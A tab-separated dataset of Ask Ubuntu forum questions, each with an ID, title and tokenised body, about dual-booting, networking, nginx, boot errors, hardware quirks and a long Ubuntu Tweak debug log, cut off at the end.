282568	how can i share files between windows xp and ubuntu 12.04 ?	i am new to ubuntu , trying to share files between os 's dual boot xp , ubuntu 12.04 . are there programs to load on each os to do this ?
282569	link-local connection to device not working	i am trying to connect to a device over link-local via ipv4 . i 've done my best to configure the gige port correctly . when i turn the device on , the ubuntu ( 12.10 ) gui pops up an icon saying i 'm connected to the device . ifconfig shows the following for eth1 : link encap : ethernet hwaddr 60 : a4:4c:22:17:08 inet addr:169.254.148.88 bcast:169.254.255.255 mask:255.255.0.0 up broadcast running multicast mtu:100 metric:1 rx packets:559 errors:0 dropped:0 overruns:0 frame:0 tx packets:2033 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:193414 ( 193.4 kb ) tx bytes:203089 ( 203.0 kb ) interrupt:18 memory : f7900000-f7920000 i have vendor supplied software that will automatically recognize the device when i run it . without going into the details , it is basically just a c++ executable that is meant to demo the provided sdk by finding a device and working with it . i do n't think it is a problem with the code . the sdk is made for linux , but their tech help is pretty inexperienced with ubuntu and thinks its just a problem with how i am setting up the connection . furthermore , i have connected this device to the same machine , same gige port , while booted into windows , and it is recognized instantly . the connection is shown here : i took the netmask and ip address from windows and used ifonfig eth1 $ ip netmask $ netmask to get them to match . i do n't much like this method , as eventually this will have to work on a computer without an ubuntu gui or a windows partition . when i tail the dmesg logs , i see that the connection is detected , but i get this message : [ 4174.533981 ] e1000e : eth1 nic link is down [ 4180.212770 ] e1000e : eth1 nic link is up 1000 mbps full duplex , flow control : rx/tx [ 4180.216769 ] netlink : 12 bytes leftover after parsing attributes . [ 4180.216772 ] netlink : 12 bytes leftover after parsing attributes . [ 4180.216929 ] netlink : 12 bytes leftover after parsing attributes . i am fairly new to linux , and very new to networking . but i 've been banging my head against this problem and making no headway . does anyone know anything about link-local , or the attribute parsing error that could give me some suggestions ?
282573	gnome classic alt-tab does n't work	the simple keyboard combination of alt-tab to switch between applications does n't work . i have followed this answer but it does n't answer the question as i want to switch to another application , not display applications and then have to select it via the mouse as it defeats the purpose of the quick switch to the other application . there is also mention of updating the keyboard shortcut settings . my keyboard combination is set to the alt-tab in the shortcut section and it does n't switch applications . seems the setting is ignored as i changed it to another keyboard combo and it just does n't switch applications .
282576	ubuntu installed , cant boot	error : boot disk not detected or harddrive has failed . i have a new hp envy23 touchsmart . the machine came with windows 8 preinstalled . windows 8 has been removed . the recovery partition exists but can only be seen under gparted , not in the file browser . the ubuntu partitions seem fine . i have installed ubuntu 13.04 but i can not boot from the harddisk . i can boot from a usbkey and the live instance shows ubuntu to be installed . is there some sort of protection preventing me from installing another os ? update : i am able to access and load the ubuntu install steps : on startup hit esc ufei application > hdd with install > efi > ubuntu > grub64.efi this is not an ideal solution
282577	windows program fails to open file	iâ´ve just installed sonar le 8.5.1 on my ubuntu 12.10 machine . and , against my expectations , it works complete fine ! except for one thing : when i record something , sonar is getting the audio-data and can save it correctly to a .wav file ( c : \cakewalk projects\ # project-name # \ # file # .wav what equals /home/user/.wine/drive_c/cakewalk projects/ # project name # / # file # .wav ) . i can play the recorded stuff with any audio-player and the file is set to 775 permissions . but : when i then press play / record in sonar , it tells me failed to open c : \cakewalk projects\ # project name # \ # file # .wav when saving the project , closing the application and opening it up again it tells me some audio files were not found and are replaced with silence . as it says , the recorded file is then `` empty '' or `` silent '' even though it exists . changing the folder/file permissions to 777 did not help : / any idea why this is happening ? thanks in advance for taking care of this : )
282591	can not install 12.04.2	i 'm running xp and am trying to install ubuntu 12.04.2 . the box is setup to boot from cd/dvd before the hard drive . it spins for a bit and then goes ahead and runs xp from the hard drive . i tried double-clicking `` ubuntu-12.04.2-desktop-i386.iso '' from within xp and it says `` windows can not open this file : '' help !
282595	why does some paid software say requires mouse ?	i have paid for software through the software center that says a mouse is required but no mouse is setup , i am running 12.04 on my laptop .
282602	what do the numbers in the output of apt-cache policy tell us ?	$ apt-cache policy pal pal : installed : 0.4.3-8 candidate : 0.4.3-8 version table : *** 0.4.3-8 0 500 http : //in.archive.ubuntu.com/ubuntu/ quantal/universe i386 packages 100 /var/lib/dpkg/status in the above output what is the meaning of 500 & 100 .
282604	how to set-up nginx correctly ? `` welcome to nginx '' is not displayed	i installed nginx on my ubuntu server 12.10 using this instructions https : //www.digitalocean.com/community/articles/how-to-install-nginx-on-ubuntu-12-04-lts-precise-pangolin , the nginx was installed from ppa : nginx/stable ( i 've added the ppa first , than updated and then installed using those instructions ) . the page i get looks like this i tried all kind of configurations from the internet and i ca n't configure it right . if you could also tell me how to set-up the node.js ( i have it installed , i tested it and it works but i do n't know how to configure it in nginx ) in here that would be a plus : )
282612	ubuntu 12.04 i have removed lightdm	my problem began when i have restarted my laptop after i have installed a new gui , i have ubuntu 12.04 with ati mobility hd 5470 , but all was fine and working good . on my ultimate edition 3.4 i have google-d how to fix that and someone suggested that : sudo apt-get remove lightdm then sudo apt-get install lightdm would solve the problem , but my problem was i only could apply sudo apt-get remove lightdm , then it wont take the install lightdm order , and i ended up with only a black screen after i boot and choose ubuntu from my dual os booting ( i have linux and win7 ) , i cant even switch or see tty . i have worked on my ubuntu a lot and do n't want just reinstall it again and lose all i have built in it before .
282614	which bios should i use for p877-v pro/thunderbolt mobo ?	first off , i 'm a total noob with linux . i 've done some google searches trying to find how to go about laying the groundwork for a fresh install of linux , using the components listed below , with no luck . before i get to learning how to use linux , i figure i need to get it running first . these are the specs of my brand new , budget , diy rig : motherboard : asus p8z77-v pro/thunderbolt cpu : i5-3570k gpu : asus hd7850-dc2-2gd5-v2 radeon hd ram : g.skill ripjaws x series 16gb ( 2x8gb ) ddr3 1600 hdd : velociraptor wd5000hhtz 500gb ( nothing installed whatsoever ) monitor : benq 24 '' gl2450hm disk drive : lg wh14ns40k i 've heard there have been problems with the default bios on this mobo , problems fixed with a recent bios update . however , going to the bios download page for the mobo in search of a newer bios , there 're no versions for linux , despite the fact i 've read ( dated ) posts about others getting linux to run on this mobo . again , i 'm just trying to get all the proper bios updates and drivers lined up before even turning on the system and proceeding with an install of ubuntu-12.10-desktop-amd64 . any links or info anyone could provide would be greatly appreciated . thanks for reading this , and apologies if this same question 's been answered before .
282626	cannnot boot to text mode with r/w fileystem	i installed ubuntu 12.10 server to a laptop , and the grub file is along the lines of : setparams 'ubuntu' recordfail gfxmod $ linux -gfxmod set root ='hd0 , msdos/' if [ [ x % feature_platform_search_hint=xy ] ; then search -- nofloppy ... ... else search -- noflopppy ... fi linux /vmliuz -3.5.0-17 ? ? ? root = /dev/map/dur2\-root ro initrd /initrd ... ( pardon , that was written by pencil and not complete , obviously ) . how can i put something like grub_cmdline_linux_default= '' text '' in there to boot to text mode ? or , is there another way to boot to text mode with a live , editable file system using grub ?
282629	how to display popup dialog after app start ?	if i use the popuputils.open ( ) command in the component.oncompleted property of the any item it does nothing , example : rectangle { id : rect height : 600 width : height component.oncompleted : { popuputils.open ( dialog , rect ) } component { id : dialog dialog { id : dialogue title : `` save file '' text : `` are you sure that you want to save this file ? '' button { text : `` cancel '' onclicked : popuputils.close ( dialogue ) } button { text : `` overwrite previous version '' color : `` orange '' onclicked : popuputils.close ( dialogue ) } button { text : `` save a copy '' color : `` orange '' onclicked : popuputils.close ( dialogue ) } } } how can i properly display a popup dialog just after the app has started ?
282631	will ubuntu touch be available for nokia devices ?	just wondering if ubuntu touch will be able to be installed on nokia smartphone devices ? i 'm assuming no due to being open source . thanks
282636	how do i uninstall ubuntu 12.10 ( 32-bit ) and replace it with 12.10 ( 64-bit ) without breaking my dual-boot with windows 8 ?	i have a 64bit laptop running win 8 on my main partition and ubuntu on another . my motherboard is uefi if that makes a difference and here is my problem ... the current ubuntu install is 32-bit . since there is no way to `` upgrade '' to 64-bit , how would i go about uninstalling ubuntu ( without breaking my windows partition ) so i can then re-install ? easiest methods would be appreciated but anything would be great .
282641	how to avoid the `` dangerous copy and paste '' problem	a brief quote from the article `` old tricks are new again : dangerous copy and paste '' at the h security website : copying and pasting something does not necessarily mean the user will get what they think they are getting . with a little bit of html magic , one can even trick unwitting web site visitors into executing shell commands without their knowledge . the trick is by no means new , but it is currently being demonstrated again on several web sites which means linux users especially have to be careful what they copy and paste . click the following link for the full article : http : //www.h-online.com/security/news/item/old-tricks-are-new-again-dangerous-copy-paste-1842898.html how do users of ubuntu 12.10 mitigate the problem ?
282642	when i try to run .sh files nothing happens ?	i tried changing the settings to /properties/permissions > allow executing as program . when i click on it , nothing happens ? any suggestions ? i do n't know if it makes a difference but it is a game ( which i read somewhere should n't be ran in some specific way )
282648	changing brightness on netbook	i am using asus eee pc r051cx . i am unable to boost up brightnes of my screen . while i was trying ubuntu 12.04 from live img from usb stick it was good , but after installing on local hard disk screen brightness reduced to minimum . i am unable to boost it from screen brightness and lock from ubuntu and from keyboard short cut . both these are setting at their max . please help what to do !
282654	installing ubuntu on a new hdd , no previous operating system	alright , so i put aside my 250 gig hard drive and installed my 1tb ( after formatting it ) . now the question is why wo n't any of my booters work , it says : boot and select proper boot device insert boot media in selected boot deice and press a key . i have the bootable usb and live dvd but they wo n't work . when formatting should my hard drive be no drive letter and ntfs or exfat or leave it as unallocated space ? am i missing something ? i 've already gone through the ubuntu install tips and still no luck . i 've tried wubi installer for windows ( through laptop ) and installed it to my fdrive but after installing like that it would n't work when i moved it to the computer .
282658	12.10 shutdown not working	i hope i do n't sound like a noob , but my shutdown is n't working . i 'm running ubuntu 12.10 and whenever i shut down and pressesc to see what 's happening , it is n't doing anything . when i return to look at the dots , they are doing what they normally do ( whether you consider it changing colors or moving or whatever ) , but shutdown is n't progressing . i tried downgrading my kernel to 3.5.0-26 but to no avail . is there anything i can do to fix this ( preferably not a fresh installation ) because i do n't want to have to force shutdown . i know it 's not the best for your hard drive , but does it have the same side effects for an ssd . if anyone has any suggestions , please tell me .
282660	extending apache charm to include apache modules	i want to deploy apache with modules such as mapcache and mapserver . can the apache charm be reused as a library ? the apache charm is non-trivial so i do n't want to copy the apache charm module and extend it since i would then be responsible for maintaining any updates to the standard apache charm . i would like to do something in the install file like this : juju-include apache2 is there anything like this ? if not , what is the best way of proceeding ?
282662	un-able to re-boot windows 8 after failed ubuntu install	ok , i tried installing ubuntu 12.10 and when installing i went to click on something else to install to a pre-made partition but when i clicked on continue i realised i either missed ( do n't laugh ) or the mouse did n't click properly but it went straight to formatting and trying to do a complete install . luckily just as it started formatting there was an error and in my panic i did n't think to write it down . after exiting the installer i checked to see if my windows partition was still ok , thankfully it was and i could still see and access everything . i then re-started my laptop to try and boot back into windows 8 . no dice , i get the error media check [ fail ] and i can now only boot up using live ubuntu , i tried installing ubunutu on a seperate 8.5gb partition i had but no dice there either . tried using boot-repair and that failed as well but here is the info summary for it http : //paste.ubuntu.com/5717818/ is it possible to fix without using a windows recovery disk ? i just have to hunt around for one is all . also it would be good to keep my files but it 's not absolutely necessary .
282665	laptop fan always on in ubuntu 12.10 ?	i have dual booted ubuntu 12.10 with windows 7 on my dell inspiron 15r 3rd gen laptop . in windows i have absolutely no problem with fan . but when i boot into ubuntu after about a min the fan speed starts increasing & about 5mins later the fan is at extremely high speed . this is resulting lots electricity being sucked by the ac adapter because it becomes extremely hot . i have ati radeon 7670m gpu . i dont know whether the cpu fan or the gpu fan is running . so i wanted to know whether it is possible to know the temperature of all the hardware like cpu , gpu , hdd , etc ? so that i can understand which driver is having the problem . any other mechanism to debug the cause of problem would also be very helpful . thank you .
282666	make gcc coloring the default	is there a way to automatically make gcc color its output ? i am looking to avoid an alias as the the command is commonly used in makefiles ( where it will not be used ) . is there an easy way to do this ? note : this does require gcc/g++ 4.9 , which is currently available via svn . i am willing to recompile if the change is something small ( in a config file or something ) . i know that the gcc_color environment variable is used , but i am not sure how to set it , or what to set it to .
282669	ubuntu tweak shutting down itself	i am using 12.04 lts . this morning when i tried to clean up some unnecessary items using janitor in ubuntu tweak ( firefox cache & thumbnail cache ) , it was suddenly shutting down/closed by itself . right in the middle of cleaning process , after i input my password . could someone advise me on this issue ? i have tried to googling this and also use the search option in this site but end up with no result . thanks . as requested by 'green7 ' , i attached the result that came in terminal when executing ubuntu tweak : ibu @ ibu-g31m-es2l-130102 : ~ $ ubuntu-tweak [ launcher ] [ debug ] distribution : ubuntu 12.04 precise application : ubuntu tweak 0.8.4-0~bzr1954+20130416~precise1 desktop : ubuntu ( ubuntu-tweak:59 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function _confirm_deps at 0x9347aac > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function _on_error at 0x9347d14 > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_find_object at 0x9361374 > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_scan_finished at 0x936141c > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_scan_error at 0x936148c > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_plugin_object_cleaned at 0x93615dc > ( debug.py:184 ) ( ubuntu-tweak:4697 ) : gconf-warning ** : : you ca n't use a gconfengine that has an active gconfclient wrapper object . use gconfclient api instead . ( ubuntu-tweak:4697 ) : gconf-warning ** : : you ca n't use a gconfengine that has an active gconfclient wrapper object . use gconfclient api instead . checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function _load_module at 0x9444bc4 > ( debug.py:184 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/tweaks ( common.py:107 ) [ commonsetting ] [ debug ] loading override ( common.py:94 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'recently-used ' ) , ( 'type ' , 'as ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'clips ' ) , ( 'type ' , 'as ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'tweaks ' ) , ( 'type ' , 'as ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'admins ' ) , ( 'type ' , 'as ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'auto-backup ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'window-size ' ) , ( 'type ' , ' ( ii ) ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'last-clip-location ' ) , ( 'type ' , 's ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'appcenter-has-update ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'appcenter-version ' ) , ( 'type ' , 's ' ) ] ( common.py:147 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.tweaks ( gsettings.py:21 ) [ app ] [ debug ] loading modules ... ( main.py:180 ) [ moduleloader ] [ info ] loading system modules for tweaks ... ( __init__.py:54 ) [ moduleloader ] [ debug ] try to load module : workarounds ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : misc ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : unity ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : sound ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : nautilus ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : lovewallpaperhd ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : fonts ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : icons ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : session ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : window ( __init__.py:159 ) [ gconfsetting ] [ debug ] got the schema_default : none for key : /apps/metacity/general/button_layout ( gconfsettings.py:27 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : theme ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : workspace ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : loginsettings ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading user extensions for tweaks ... ( __init__.py:64 ) [ app ] [ info ] creating modulebutton : < class 'fonts.fonts ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'misc.misc ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'sound.sound ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'theme.theme ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'loginsettings.loginsettings ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'session.session ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'icons.icons ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'lovewallpaperhd.lovewallpaperhd ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'unity.unity ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'window.window ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'workspace.workspace ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'nautilus.nautilus ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'workarounds.workarounds ' > ( main.py:51 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/admins ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.admins ( gsettings.py:21 ) [ app ] [ debug ] loading modules ... ( main.py:180 ) [ moduleloader ] [ info ] loading system modules for admins ... ( __init__.py:54 ) [ moduleloader ] [ debug ] try to load module : userdir ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : templates ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : filetypemanager ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : sourceeditor ( __init__.py:159 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function process_data at 0x954caac > ( debug.py:184 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : shortcuts ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : scripts ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : desktoprecovery ( __init__.py:159 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function process_data at 0x961ed14 > ( debug.py:184 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : appcenter ( __init__.py:159 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/appcenter-has-update ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : false for key : com.ubuntu-tweak.tweak.appcenter-has-update ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/appcenter-version ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : for key : com.ubuntu-tweak.tweak.appcenter-version ( gsettings.py:21 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_have_update at 0x9632534 > ( debug.py:184 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : quicklists ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : sourcecenter ( __init__.py:159 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/appcenter-has-update ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : false for key : com.ubuntu-tweak.tweak.appcenter-has-update ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/appcenter-version ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : for key : com.ubuntu-tweak.tweak.appcenter-version ( gsettings.py:21 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_have_update at 0x964f4fc > ( debug.py:184 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.apps/disable-warning ( common.py:107 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'disable-warning ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'apps-can-update ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'apps-version ' ) , ( 'type ' , 's ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'sources-can-update ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'sources-version ' ) , ( 'type ' , 's ' ) ] ( common.py:147 ) [ gsetting ] [ debug ] got the schema_default : false for key : com.ubuntu-tweak.apps.disable-warning ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.apps/sources-can-update ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : false for key : com.ubuntu-tweak.apps.sources-can-update ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.apps/sources-version ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : for key : com.ubuntu-tweak.apps.sources-version ( gsettings.py:21 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function show_warning at 0x9653454 > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function upgrade_sources at 0x96535a4 > ( debug.py:184 ) [ gtk ] [ debug ] < function post_ui at 0x9038b8c > : ( debug.py:182 ) [ gtk ] [ debug ] args-1 : < function on_have_update at 0x9653614 > ( debug.py:184 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading user extensions for admins ... ( __init__.py:64 ) [ app ] [ info ] creating modulebutton : < class 'appcenter.appcenter ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'sourcecenter.sourcecenter ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'desktoprecovery.desktoprecovery ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'quicklists.quicklists ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'scripts.scripts ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'shortcuts.shortcuts ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'templates.templates ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'userdir.userdir ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'filetypemanager.filetypemanager ' > ( main.py:51 ) [ app ] [ info ] creating modulebutton : < class 'sourceeditor.sourceeditor ' > ( main.py:51 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/recently-used ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.recently-used ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/clips ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ 'hardwareinfo ' , 'systeminfo ' , 'cleanerinfo ' , 'updateinfo ' ] for key : com.ubuntu-tweak.tweak.clips ( gsettings.py:21 ) [ clippage ] [ debug ] load clips , do_remove : false ( __init__.py:137 ) [ clippage ] [ debug ] all clips to load : [ 'hardwareinfo ' , 'systeminfo ' , 'cleanerinfo ' , 'updateinfo ' ] ( __init__.py:145 ) [ moduleloader ] [ info ] loading system modules for clips ... ( __init__.py:54 ) [ moduleloader ] [ debug ] try to load module : cleanerinfo ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : userinfo ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : systeminfo ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : updateinfo ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : hardwareinfo ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading user extensions for clips ... ( __init__.py:64 ) [ clippage ] [ debug ] load clip : hardwareinfo ( __init__.py:153 ) [ clippage ] [ debug ] load clip : systeminfo ( __init__.py:153 ) [ clippage ] [ debug ] load clip : cleanerinfo ( __init__.py:153 ) [ clippage ] [ debug ] load clip : updateinfo ( __init__.py:153 ) [ clippage ] [ debug ] overview page : setup_recently_used , 6 used items found ( __init__.py:168 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` loginsettings '' for `` tweaks '' ... ( __init__.py:118 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` misc '' for `` tweaks '' ... ( __init__.py:118 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` theme '' for `` tweaks '' ... ( __init__.py:118 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` sound '' for `` tweaks '' ... ( __init__.py:118 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` fonts '' for `` tweaks '' ... ( __init__.py:118 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading module `` nautilus '' for `` tweaks '' ... ( __init__.py:118 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.janitor/auto-scan ( common.py:107 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'plugins ' ) , ( 'type ' , 'as ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'auto-scan ' ) , ( 'type ' , 'b ' ) ] ( common.py:147 ) [ commonsetting ] [ debug ] try to get type for value : [ ( 'name ' , 'janitor-view-width ' ) , ( 'type ' , 'i ' ) ] ( common.py:147 ) [ gsetting ] [ debug ] got the schema_default : true for key : com.ubuntu-tweak.janitor.auto-scan ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.janitor/plugins ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.janitor.plugins ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.janitor/janitor-view-width ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : 0 for key : com.ubuntu-tweak.janitor.janitor-view-width ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/clips ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ 'hardwareinfo ' , 'systeminfo ' , 'cleanerinfo ' , 'updateinfo ' ] for key : com.ubuntu-tweak.tweak.clips ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/tweaks ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.tweaks ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/admins ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.admins ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.janitor/plugins ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : 